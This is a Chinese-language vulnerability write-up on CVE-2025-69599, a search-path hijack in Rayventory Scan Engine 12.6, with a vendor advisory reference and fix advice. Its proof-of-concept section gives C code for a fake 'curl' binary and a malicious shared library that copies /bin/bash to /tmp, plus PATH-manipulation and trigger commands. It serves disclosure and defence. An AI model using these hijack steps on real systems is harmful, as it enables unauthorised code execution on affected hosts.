Rayventory Scan Engine 12.6 路径注入致RCE (CVE-2025-69599)

# CVE-2025-69599 漏洞总结 ## 漏洞概述 **CVE-2025-69599** 是一个**不受控的搜索路径元素（Uncontrolled Search Path Element）**漏洞。 当 Rayventory 扫描引擎在加载共享对象和调用系统二进制文件（如 `curl`、`ndtrack`）时，使用了相对路径。攻击者可以通过篡改 `PATH` 环境变量，将恶意二进制文件放置在特定目录中，从而在目标系统上执行任意代码。 ## 影响范围 * **作者**: Rafael José Nuñez Gullas * **公司**: Iberian Var Group * **受影响产品**: Rayventory Scan Engine 12.6 Update 8 及更早版本 * **Raynet 建议**: RSEC200965 ## 利用原理与 POC 代码 ### 1. 针对 `curl` 的利用 漏洞利用依赖于 `rvia` 命令调用 `curl` 时的相对路径问题。 **恶意代码 (curl.c):** ```c #include #include int main() { system("whoami"); return 0; } ``` **编译与利用步骤:** ```bash gcc curl.c -o curl # 编译二进制文件 export PATH=/tmp:$PATH # 修改 PATH 变量，将 /tmp 置于首位 # 触发漏洞 /opt/rvia/rvia getconfig http://localhost # 或者 /opt/rvia/rvia upload http://localhost ``` ### 2. 针对 `ndtrack` 的利用 `ndtrack` 二进制文件在内部调用 `cat` 和 `ndtrack` 命令时使用了相对路径。 **检测命令:** ```bash $ strings -a bin/ndtrack | grep -E '^cat' cat ``` **恶意共享对象利用 (libnetselector.so):** 攻击者可以创建自定义共享对象 `libnetselector.so`，当 `ndtrack` 加载该库时执行恶意代码。 **恶意代码 (libnetselector.c):** ```c #include #include #include #include void init() { setuid(1001); setgid(1001); system("cp /bin/bash /tmp/bash_so_hijack"); } ``` **编译与利用步骤:** ```bash gcc -fPIC -shared -o libnetselector.so libnetselector.c -nostartfiles # 编译共享对象 cd /tmp cd lib # 将编译好的 libnetselector.so 放入 lib 目录 # 触发漏洞 /opt/rvia/bin/ndtrack ``` ## 修复方案 * **官方建议**: 参考 Raynet 安全建议 **RSEC200965**。 * **技术修复方向**: 修改代码，避免在加载共享对象和调用系统二进制文件时使用相对路径，应使用绝对路径或确保 `PATH` 环境变量未被恶意篡改。 * **注意**: 直接调用 `ndtrack` 时漏洞有效，但通过 `inventory` 选项调用时，由于脚本 `/opt/rvia/bin/ndtrack` 会重置 `LD_LIBRARY_PATH` 和 `PATH`，因此该特定路径下的利用可能受限。

目标达成感谢每一位支持者 — 我们达成了 100% 目标！

Rayventory Scan Engine 12.6 路径注入致RCE (CVE-2025-69599)

同源更多文章

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

Rayventory Scan Engine 12.6 路径注入致RCE (CVE-2025-69599)

同源更多文章

目标达成感谢每一位支持者 — 我们达成了 100% 目标！